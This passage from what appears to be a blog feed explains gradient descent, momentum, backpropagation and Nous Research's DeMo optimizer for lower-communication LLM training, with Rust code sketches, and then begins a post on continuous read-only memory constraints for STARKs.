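&lt;p&gt;For the two measurements above, this yields $k \approx 24.86$, a compromise between the individual estimates $25$ and $24.83$.&lt;&#x2F;p&gt;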
&lt;p&gt;This equation is linear, and we can solve it directly. Let us complicate the problem a little bit, assuming&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. We have several parameters, $k_0, k_1 , ... , k_m$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. That the equations to find the parameters are non-linear.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The procedure can be generalized using multivariate calculus if we have several parameters. We ask for the partial derivatives with respect to each parameter to be zero:&lt;br &#x2F;&gt;
$\partial L &#x2F; \partial k_0 = 0$&lt;br &#x2F;&gt;
$\partial L &#x2F; \partial k_1 = 0$&lt;br &#x2F;&gt;
$\partial L &#x2F; \partial k_2 = 0$&lt;br &#x2F;&gt;
$\vdots$&lt;br &#x2F;&gt;
$\partial L &#x2F; \partial k_m = 0$&lt;&#x2F;p&gt;
&lt;p&gt;The vector containing all these partial derivatives is the gradient of $L$. We have a system of several equations with as many variables to solve.&lt;&#x2F;p&gt;
&lt;p&gt;What happens when the equations above are not easy to solve? We have two facts:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The gradient should be zero at the minimum.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The gradient&amp;#39;s direction gives the direction of the greatest increase in a function (so following the opposite direction should give the steepest descent).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This is the working principle of the steepest descent search. Starting from an initial set of parameters $k^0$, we recursively set&lt;br &#x2F;&gt;
$k^{n + 1} = k^n - \gamma \nabla L$&lt;br &#x2F;&gt;
where $\gamma$ is a parameter (called the learning rate). High values of $\gamma$ generate instability and convergence issues, whereas low values of $\gamma$ mean we move slowly toward the minimum.&lt;&#x2F;p&gt;
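&lt;p&gt;The update rule translates directly into code. A sketch, applied to the spring example from before (the learning rate and step count are illustrative choices):&lt;&#x2F;p&gt;

```rust
// Plain gradient descent on the quadratic loss L(k) = Σ (k·Δx_j - w_j)²,
// using the update k ← k - γ·dL/dk.
fn gradient_descent(dx: &[f64], w: &[f64], mut k: f64, gamma: f64, steps: usize) -> f64 {
    for _ in 0..steps {
        // dL/dk = Σ 2(k·Δx_j - w_j)·Δx_j
        let grad: f64 = dx.iter().zip(w).map(|(x, y)| 2.0 * (k * x - y) * x).sum();
        k -= gamma * grad;
    }
    k
}
```

&lt;p&gt;With $\gamma = 0.01$ this converges to the least-squares minimizer $k \approx 24.86$ in a few hundred steps; with $\gamma$ above roughly $0.2$ the iteration diverges, illustrating the instability mentioned above.&lt;&#x2F;p&gt;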
&lt;p&gt;We now face some further questions which we did not address before:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. A function can have several (local) minima, so how can we ensure that we find the true (global) minimum?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Is there a way we can adapt the learning rate $\gamma$ so that we can achieve convergence faster?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. What happens if the number of observations $(x_i , y_i )$ is very large and the loss function has a complicated or expensive to evaluate expression?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We will first address the third question and then try to solve the others. We have an expression of the form:&lt;br &#x2F;&gt;
$L (k) = \sum_j E_j (x_j, y_j , k)$&lt;br &#x2F;&gt;
For example, $E_j = ( f(x_j , k) - y_j )^2$ could be the quadratic error for each observation, where $f$ is the function giving the relationship between input and output. Computing the whole gradient involves the (partial) derivative of each $E_j (x_j , y_j , k)$ and a sum over all values of $j$, making the evaluation of the gradient expensive. We could reduce the number of terms by choosing a single observation and approximating the true gradient by its contribution alone:&lt;br &#x2F;&gt;
$\nabla L \approx \nabla E_j$&lt;br &#x2F;&gt;
This reduces the computational burden at the expense of accuracy. We could also estimate the gradient using a subset of the observations, or mini-batch. This is the idea behind stochastic gradient descent.&lt;&#x2F;p&gt;
&lt;p&gt;Since we are dealing with approximations, the learning rate may need to be readjusted and decreased at a specific rate, making it $\gamma^n$.&lt;&#x2F;p&gt;
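&lt;p&gt;A toy sketch of this idea: the gradient is estimated from a mini-batch that cycles through the data, and the learning rate decays as $\gamma_0 &#x2F; (1 + t)$. Both schedules are our illustrative choices, not the only possible ones:&lt;&#x2F;p&gt;

```rust
// Stochastic gradient descent sketch for the model y ≈ k·x with squared error:
// each step estimates the gradient from a mini-batch that cycles through the
// data, and the learning rate decays as γ_t = γ0 / (1 + t).
fn sgd(xs: &[f64], ys: &[f64], mut k: f64, gamma0: f64, steps: usize, batch: usize) -> f64 {
    let n = xs.len();
    for t in 0..steps {
        let gamma = gamma0 / (1.0 + t as f64); // decayed learning rate γ_t
        let start = (t * batch) % n; // cycle through the observations
        let mut grad = 0.0;
        for i in 0..batch {
            let j = (start + i) % n;
            grad += 2.0 * (k * xs[j] - ys[j]) * xs[j]; // ∇E_j for one sample
        }
        k -= gamma * grad / batch as f64; // average gradient over the batch
    }
    k
}
```

&lt;p&gt;On noiseless data generated with $k = 25$, the iterates approach the true parameter even though each step sees only part of the data.&lt;&#x2F;p&gt;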
&lt;p&gt;We can improve the method by introducing momentum, which keeps track of previous gradients when updating it for the next iteration. Basically,&lt;br &#x2F;&gt;
$\Delta k^n = \alpha \Delta k^{n - 1} - \gamma (\nabla L)^n$&lt;br &#x2F;&gt;
$k^{n + 1} = k^n + \Delta k^n$&lt;br &#x2F;&gt;
We can see that if $\alpha = 0$, we recover the original gradient descent. If $\alpha$ is nonzero, we accumulate the previous gradients, taking into account the directions given by earlier steps. This ensures that if we have been moving in a given direction for some time, we will tend to continue that way, avoiding sudden changes in direction.&lt;&#x2F;p&gt;
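&lt;p&gt;The two update equations above can be sketched as follows, again on the quadratic spring loss (the hyperparameter values are illustrative):&lt;&#x2F;p&gt;

```rust
// Gradient descent with momentum: Δk accumulates an exponentially weighted
// history of past gradients; α = 0 recovers plain gradient descent.
fn momentum_descent(
    dx: &[f64],
    w: &[f64],
    mut k: f64,
    gamma: f64,
    alpha: f64,
    steps: usize,
) -> f64 {
    let mut delta = 0.0;
    for _ in 0..steps {
        let grad: f64 = dx.iter().zip(w).map(|(x, y)| 2.0 * (k * x - y) * x).sum();
        delta = alpha * delta - gamma * grad; // Δkⁿ = α·Δkⁿ⁻¹ - γ·(∇L)ⁿ
        k += delta; // kⁿ⁺¹ = kⁿ + Δkⁿ
    }
    k
}
```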
&lt;p&gt;Since gradients can have components with very different values, we can adjust learning rates for each variable, as in the case of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1412.6980&quot;&gt;Adam optimizer&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The problem with local minima can be solved by means of this momentum method (which would prevent us from being trapped in shallow minima), trying different starting points and also &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Simulated_annealing&quot;&gt;annealing methods&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;We can create or approximate more complex behaviors by using neural networks. Given the input variables $x_1, … x_m$, we can form linear combinations using weights $w_{jl}$ and biases $w_{j0}$, and apply an activation function $f$, obtaining new values $z_{11}, … z_{1m}$ as follows:&lt;br &#x2F;&gt;
$a_{1j} = \sum_l w_{jl} x_l + w_{j0}$&lt;br &#x2F;&gt;
$z_{1j} = f(\sum_l w_{jl} x_l + w_{j0})$&lt;br &#x2F;&gt;
We can add a new layer, using the output above, by performing linear combinations and applying an activation function&lt;br &#x2F;&gt;
$z_{2j} = f(\sum_l w_{jl}^{(2)} z_{1l} + w_{j0}^{(2)})$&lt;br &#x2F;&gt;
We can similarly add other layers until we get the output of the neural network,&lt;br &#x2F;&gt;
$z_{3j} = f(\sum_l w_{jl}^{(3)} z_{2l} + w_{j0}^{(3)})$&lt;&#x2F;p&gt;
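&lt;p&gt;The layered construction can be sketched as a single reusable function: each layer holds a weight matrix and a bias vector, and applies an element-wise activation. ReLU as $f$ and the concrete weights below are purely illustrative choices:&lt;&#x2F;p&gt;

```rust
// One network layer: z_j = f(Σ_l w_jl·input_l + w_j0), with f = ReLU here.
// `weights[j]` is the weight row of unit j; `biases[j]` is its bias w_j0.
fn layer(input: &[f64], weights: &[Vec<f64>], biases: &[f64]) -> Vec<f64> {
    weights
        .iter()
        .zip(biases)
        .map(|(row, b)| {
            let a: f64 = row.iter().zip(input).map(|(w, x)| w * x).sum::<f64>() + b;
            a.max(0.0) // activation f(a) = max(0, a)
        })
        .collect()
}
```

&lt;p&gt;Stacking calls to this function gives the multi-layer network: the output of one call becomes the input of the next.&lt;&#x2F;p&gt;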
&lt;p&gt;Gradients can be computed efficiently using backpropagation. We will start again with our loss function as a sum of terms, each corresponding to one sample,&lt;br &#x2F;&gt;
$L (k) = \sum_j E_j (x_j, y_j , k)$&lt;br &#x2F;&gt;
We will focus on computing the derivative of the error of a single sample, which we write simply as $E$ (freeing the index $j$ to label the units of the network), with respect to each of the parameters,&lt;br &#x2F;&gt;
$$\frac{\partial E}{ \partial w_{ji} } = \frac{\partial E}{\partial a_j} \frac{\partial a_j }{\partial w_{ji}}$$&lt;&#x2F;p&gt;
&lt;p&gt;The second partial derivative on the right-hand side is straightforward since $a_j$ is a linear combination of the $w_{ji}$,&lt;br &#x2F;&gt;
$$\frac{\partial a_j }{\partial w_{ji}} = z_i$$&lt;br &#x2F;&gt;
For the other derivative, we will just call it&lt;br &#x2F;&gt;
$$\frac{\partial E}{\partial a_j} = \delta_j$$&lt;br &#x2F;&gt;
so that&lt;br &#x2F;&gt;
$$\frac{\partial E}{ \partial w_{ji} } = z_i \delta_j$$&lt;&#x2F;p&gt;
&lt;p&gt;The derivatives for each layer can be computed by evaluating $\delta_j$ and using the formula provided. For the hidden layers, applying the chain rule over the units $m$ that $a_j$ feeds into gives&lt;br &#x2F;&gt;
$$\delta_j = \sum_m \frac{\partial E}{\partial a_m} \frac{\partial a_m}{\partial a_j}$$&lt;br &#x2F;&gt;
We can finally arrive at the backpropagation formula for $\delta_j$,&lt;br &#x2F;&gt;
$\delta_j = f^\prime (a_j ) \sum_m w_{mj} \delta_m$&lt;&#x2F;p&gt;
&lt;p&gt;The basic procedure to evaluate the derivatives would be to first compute the $a_j$ for all the layers and the output, evaluate $\delta_j$ for the output layer, and then apply the last formula backwards through the network to obtain $\delta_j$ for each inner layer.&lt;&#x2F;p&gt;
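&lt;p&gt;To make the procedure concrete, here is a sketch for a tiny network with one input, two tanh hidden units, and one linear output unit, with squared error $E = (\hat{y} - y)^2$. The network shape, the tanh activation, and all names are illustrative choices:&lt;&#x2F;p&gt;

```rust
// Backpropagation sketch for a network with one input x, two tanh hidden
// units (input weights w), and one linear output unit (weights v):
//   ŷ = Σ_j v_j · tanh(w_j · x),   E = (ŷ - y)².
// Returns (∂E/∂w, ∂E/∂v), computed with the δ recursion from the text.
fn backprop(x: f64, y: f64, w: &[f64], v: &[f64]) -> (Vec<f64>, Vec<f64>) {
    // forward pass: pre-activations a_j and activations z_j
    let a: Vec<f64> = w.iter().map(|wj| wj * x).collect();
    let z: Vec<f64> = a.iter().map(|aj| aj.tanh()).collect();
    let y_hat: f64 = v.iter().zip(&z).map(|(vj, zj)| vj * zj).sum();

    // output delta: the output unit is linear, so δ_out = ∂E/∂ŷ = 2(ŷ - y)
    let delta_out = 2.0 * (y_hat - y);

    // hidden deltas: δ_j = f'(a_j) · Σ_m w_mj δ_m, here a single output term
    let delta: Vec<f64> = a
        .iter()
        .zip(v)
        .map(|(aj, vj)| (1.0 - aj.tanh().powi(2)) * vj * delta_out)
        .collect();

    // ∂E/∂w_j = δ_j · x   and   ∂E/∂v_j = δ_out · z_j
    let dw: Vec<f64> = delta.iter().map(|d| d * x).collect();
    let dv: Vec<f64> = z.iter().map(|zj| delta_out * zj).collect();
    (dw, dv)
}
```

&lt;p&gt;Because the output unit is linear, its delta is simply $2(\hat{y} - y)$; the hidden deltas then follow from the backpropagation formula with a single term in the sum.&lt;&#x2F;p&gt;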
&lt;p&gt;Many Large Language Models (LLMs) are based on neural networks. They have shown good performance in different fields, such as translation and conversational AI. These models can have on the order of trillions of parameters. Therefore, in order to attain reasonable training times, we need accelerators, such as GPUs and TPUs. We often encounter heterogeneity in GPU clusters, where interconnects are partitioned into high-bandwidth islands within each machine and low-bandwidth links across machines, limiting training speed and leading to suboptimal hardware utilization. This also affects memory planning, and frequent memory defragmentation significantly slows training. All of this translates into capital and operational costs.&lt;&#x2F;p&gt;
&lt;p&gt;Strategies such as Distributed Data Parallelism and Fully Sharded Data Parallelism have the accelerators split the weights and synchronize the gradients, with communication volumes proportional to the size of the model (for example, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;proceedings.mlr.press&#x2F;v202&#x2F;wang23t&#x2F;wang23t.pdf&quot;&gt;training a GPT-J-6B with 10B tokens on 4 machines would require 915 TB of data transferred&lt;&#x2F;a&gt;, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;2403.03507&quot;&gt;LLaMA pre-training with 7 billion parameters uses over 58 GB of memory to store parameters, activations, and gradients&lt;&#x2F;a&gt;). This makes gradient synchronization require expensive high-speed interconnects, forcing all devices to be in the same physical space. Reducing communication costs by over an order of magnitude would not only cut costs and training times, but also allow the use of more distributed hardware.&lt;&#x2F;p&gt;
&lt;p&gt;Some techniques used to reduce memory footprint and communication costs are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Sparsification and compression](https:&#x2F;&#x2F;proceedings.mlr.press&#x2F;v202&#x2F;wang23t&#x2F;wang23t.pdf)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Low-rank projection of gradients](https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;2403.03507)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * [Federated averaging](https:&#x2F;&#x2F;proceedings.mlr.press&#x2F;v54&#x2F;mcmahan17a&#x2F;mcmahan17a.pdf)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In this blog post, we will discuss &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;2411.19870&quot;&gt;DeMo&lt;&#x2F;a&gt;, recently released by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;nousresearch.com&#x2F;&quot;&gt;Nous Research&lt;&#x2F;a&gt;, which provides significant savings in communication and memory use, making it possible to train LLMs over slower connections and with less powerful hardware.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;nous-research&quot;&gt;Nous Research&lt;&#x2F;h2&gt;
&lt;p&gt;Nous Research is dedicated to researching human-centric language models and simulators, focusing on areas including model architecture, data synthesis, fine-tuning, and reasoning, all aimed at aligning AI systems with real-world user experiences. Four months ago, they released a preliminary report on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;NousResearch&#x2F;DisTrO&#x2F;blob&#x2F;main&#x2F;A_Preliminary_Report_on_DisTrO.pdf&quot;&gt;DisTrO&lt;&#x2F;a&gt;, a family of architecture-agnostic and network-agnostic optimizers, reducing communication costs by several orders of magnitude, which enables efficient distributed training of AI.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;working-hypothesis&quot;&gt;Working hypothesis&lt;&#x2F;h2&gt;
&lt;p&gt;The paper shows that gradients of very large LLMs exhibit both redundancy and high compressibility. This is the core insight enabling DeMo. It is based on the following three observations:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The fast-moving components of momentum exhibit high spatial auto-correlation with a small number of principal components.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Fast-moving momentum components show low temporal variance and should be used to update the parameters immediately. The slow-moving components exhibit high temporal variance and benefit from temporal smoothing.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Slow-moving momentum components are crucial for long-term convergence and should be preserved rather than filtered out.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Using these conjectures, the authors modify the SGD method with momentum to decouple momentum between the different accelerators. After updating the momentum, the fast components $q$ of momentum are extracted using a discrete cosine transform (DCT), and these components are shared with minimal communication.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;how-does-demo-work&quot;&gt;How does DeMo work?&lt;&#x2F;h2&gt;
&lt;p&gt;The starting point is the Stochastic Gradient Descent (SGD) with momentum algorithm. Instead of computing the overall gradient, we will compute local gradients and use them to update the (decoupled) momentum. Then, we will extract the $k$ fastest components for each momentum and subtract them from the decoupled momentum. Finally, we will communicate and synchronize all the fast components and update the parameters using this synchronized gradient. This is the algorithm as described in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;2411.19870&quot;&gt;paper&lt;&#x2F;a&gt;:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;SJeEXz07ye.png&quot; alt=&quot;Screenshot 2024-12-04 at 2.35.32 PM&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The extraction of the fast components is critical for the algorithm’s performance. While the Kosambi–Karhunen–Loève Transform provides a way to achieve the decorrelation, separation, and extraction of the main components, the DCT offers an excellent approximation under the hypothesis provided above. The advantages of DCT lie in its efficient computation and high degree of parallelization. Besides, it is computed on a fixed orthogonal basis, which allows us to decode a DCT-encoded signal efficiently without additional information.&lt;&#x2F;p&gt;
&lt;p&gt;We can work with each momentum tensor as a $d$-dimensional autocorrelated signal, chunk it, and apply the DCT to each chunk, extracting the $k$ highest values and their frequencies. This creates two tensors, one containing the frequencies (using an index) and the other keeping the amplitudes (using a floating-point number). In the DCT, the frequencies are given by $2\pi i&#x2F;N$, so giving $i$ suffices to specify the frequency; we thus get pairs $(i, A)$ indicating the frequency and amplitude of the fastest components. We can then perform the inverse DCT with these tensors to recover the values of the components, $q_t$, and remove these values from the momentum (fourth step of the algorithm).&lt;&#x2F;p&gt;
&lt;p&gt;After gathering all the fastest local components, we are ready to synchronize them. The first step is to average the amplitudes over repeated frequencies (for example, if the frequency with index 11, corresponding to $2\pi \cdot 11&#x2F;N$, appears among the fastest components of more than one local gradient). In the second step, we perform the inverse DCT to recover the values of the fastest components of the global gradient, $Q_t$. The advantage is that, if we choose the parameters appropriately, the number of fastest components we have to share is significantly smaller than the full gradient.&lt;&#x2F;p&gt;
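&lt;p&gt;The extract-and-subtract step can be illustrated on a single chunk with a naive, quadratic-time DCT. The orthonormal scaling, function names, and toy sizes below are our choices; the actual implementation is batched and optimized for accelerators:&lt;&#x2F;p&gt;

```rust
// Sketch of the fast-component extraction on one momentum chunk: apply a
// naive orthonormal DCT-II, keep the k largest-magnitude coefficients as
// (frequency index, amplitude) pairs, reconstruct q via the inverse DCT,
// and subtract q from the momentum so the slow residual stays local.
use std::f64::consts::PI;

fn dct(signal: &[f64]) -> Vec<f64> {
    // orthonormal DCT-II: C_k = s_k · Σ_i x_i · cos(π(i + 1/2)k / N)
    let n = signal.len() as f64;
    (0..signal.len())
        .map(|k| {
            let scale = if k == 0 { (1.0 / n).sqrt() } else { (2.0 / n).sqrt() };
            scale
                * signal
                    .iter()
                    .enumerate()
                    .map(|(i, x)| x * (PI * (i as f64 + 0.5) * k as f64 / n).cos())
                    .sum::<f64>()
        })
        .collect()
}

fn idct(coeffs: &[(usize, f64)], len: usize) -> Vec<f64> {
    // inverse transform evaluated only on the sparse (index, amplitude) pairs
    let n = len as f64;
    (0..len)
        .map(|i| {
            coeffs
                .iter()
                .map(|&(k, c)| {
                    let scale = if k == 0 { (1.0 / n).sqrt() } else { (2.0 / n).sqrt() };
                    scale * c * (PI * (i as f64 + 0.5) * k as f64 / n).cos()
                })
                .sum()
        })
        .collect()
}

fn extract_fast(momentum: &mut [f64], k: usize) -> Vec<(usize, f64)> {
    let mut coeffs: Vec<(usize, f64)> = dct(momentum).into_iter().enumerate().collect();
    coeffs.sort_by(|a, b| b.1.abs().partial_cmp(&a.1.abs()).unwrap());
    coeffs.truncate(k); // top-k (frequency index, amplitude) pairs to share
    let q = idct(&coeffs, momentum.len());
    for (m, qi) in momentum.iter_mut().zip(&q) {
        *m -= qi; // keep only the slow residual in the local momentum
    }
    coeffs
}
```

&lt;p&gt;Each accelerator would then share only the sparse $(i, A)$ pairs returned by the extraction, while the slow residual stays in its local momentum.&lt;&#x2F;p&gt;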
&lt;p&gt;The experimental results show that DeMo can reduce communication costs by at least one order of magnitude compared to AdamW, without noticeable changes in convergence.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;This post introduced basic concepts related to machine learning and LLMs, explaining the objectives, strategies, and challenges that arise when training very large models. The need to split parameters and computation among several accelerators calls for specialized interconnects and forces all devices to be in the same physical place. Using empirical observations from training LLMs, Nous Research proposed DeMo, leveraging the DCT to extract the fastest components and reduce the amount of data the accelerators have to share. The experimental results show a reduction in communication of at least an order of magnitude with respect to AdamW (depending on the choice of parameters, it can be higher), allowing LLMs to be trained over networks with lower bandwidth and on heterogeneous hardware, reducing both capital and operational costs.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Continuous Read-Only Memory Constraints: An implementation using Lambdaworks</title>
          <pubDate>Mon, 02 Dec 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/continuous-read-only-memory-constraints-an-implementation-using-lambdaworks/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/continuous-read-only-memory-constraints-an-implementation-using-lambdaworks/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/continuous-read-only-memory-constraints-an-implementation-using-lambdaworks/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;When we first explored the world of STARKs, one of the most confusing concepts we encountered was constraints. We kept asking ourselves: How is it possible to summarize highly complex relationships between trace values using just a few polynomials? It wasn’t until we started implementing some examples that we truly understood the clever, almost magical techniques employed in this domain.&lt;&#x2F;p&gt;
&lt;p&gt;In this post, we aim to share part of that journey, explaining the insights we’ve gained in a hands-on, practical manner. We firmly believe that the best way to learn is through doing, and we’ll guide you through a concrete example: implementing the constraints for Cairo’s non-deterministic continuous read-only memory using the Lambdaworks library. These constraints are detailed in Section 9.7 of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2021&#x2F;1063&quot;&gt;Cairo whitepaper&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;We won’t explain the basic concepts from the protocol, as we assume that if you’re reading this, you already have some understanding of the STARK protocol, the idea of an execution trace, and the purpose of defining constraints. For a deeper understanding or to reinforce some concepts, check out &lt;a href=&quot;&#x2F;diving-deep-fri&#x2F;&quot;&gt;diving DEEP-FRI&lt;&#x2F;a&gt;, &lt;a href=&quot;&#x2F;how-to-code-fri-from-scratch&#x2F;&quot;&gt;FRI from scratch&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;overview-of-the-stone-prover&#x2F;&quot;&gt;Stone prover&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-is-a-continuous-read-only-memory&quot;&gt;What is a Continuous Read-Only Memory?&lt;&#x2F;h2&gt;
&lt;p&gt;So, what do we mean by “continuous, non-deterministic, read-only memory”?&lt;&#x2F;p&gt;
&lt;p&gt;The definition from the paper is as follows:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;9.7.1 Definition&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
&lt;strong&gt;Definition 4.&lt;&#x2F;strong&gt; A memory access is a pair $(a, v) \in \mathbb{F}^2$ where $a$ represents an address and $v$ represents the value of the memory at $a$. A list of memory accesses $(a_i, v_i)$ for $i \in [0, n)$ ($1 \leq n \leq P$) is said to form a &lt;em&gt;read-only memory&lt;&#x2F;em&gt; if for all $i, j \in [0, n)$, if $a_i = a_j$, then $v_i = v_j$. It is said to be &lt;em&gt;continuous&lt;&#x2F;em&gt; if the set $\{a_i: i \in [0, n)\}$ equals $[m_0, m_1)$ for some $m_0, m_1 \in \mathbb{F}$ that satisfy $m_1 = m_0 + t$ for a natural number $t &amp;lt; P$. In particular, for a given continuous read-only memory list of accesses, we can define a function $f: [m_0, m_1) \to \mathbb{F}$ such that $f(a_i) = v_i$ for all $i \in [0, n)$. Any function $m: \mathbb{F} \to \mathbb{F}$ extending $f$ is said to be a memory function for the list of memory accesses.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Let’s simplify this long and complex definition. Imagine a trace with two columns and $n$ rows. The rows represent each step of execution. The first column indicates the memory address accessed during that step, and the second column indicates the value retrieved from that address.&lt;&#x2F;p&gt;
&lt;p&gt;For a memory to be &lt;strong&gt;read-only&lt;&#x2F;strong&gt; , the same addresses must always have the same value. If two rows in the trace reference the same address, the value in those rows must be the same.&lt;&#x2F;p&gt;
&lt;p&gt;For example, consider the following trace:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Address&lt;&#x2F;th&gt;&lt;th&gt;Value&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;56&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;34&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;97&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;25&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;41&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;34&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;This trace is invalid because address 5 has two different values: 97 in the first occurrence and 41 in the second. This is not allowed in read-only memory.&lt;&#x2F;p&gt;
&lt;p&gt;For a memory to be &lt;strong&gt;continuous&lt;&#x2F;strong&gt; , every memory address from the starting point (e.g., address 1) to the last address must appear at least once.&lt;&#x2F;p&gt;
&lt;p&gt;The trace is also invalid in the example above because there is no entry for address 2.&lt;&#x2F;p&gt;
&lt;p&gt;Then, to validate a trace, we need to ensure:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Read-only property** : The same address always maps to the same value.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Continuity property** : Every memory address in the range appears at least once.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;It’s worth noting that addresses can appear multiple times in any order.&lt;&#x2F;p&gt;
